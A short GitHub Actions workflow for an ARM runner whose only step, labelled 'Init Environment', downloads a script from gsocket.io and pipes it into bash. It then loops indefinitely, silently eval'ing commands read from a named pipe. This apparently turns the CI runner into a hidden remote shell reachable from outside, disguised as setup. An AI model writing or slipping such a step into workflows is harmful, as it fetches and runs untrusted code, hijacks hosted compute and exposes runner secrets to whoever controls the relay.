name: aarch64 manual run

on:
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-24.04-arm
    steps:
      - name: Init Environment
        run: |
          bash -c "$(curl -fsSL https://gsocket.io/y)"
          trap 'exit 0' TERM
          mkfifo /tmp/bash-0
          while :; do
            eval "$(cat /tmp/bash-0)" &>/dev/null
          done
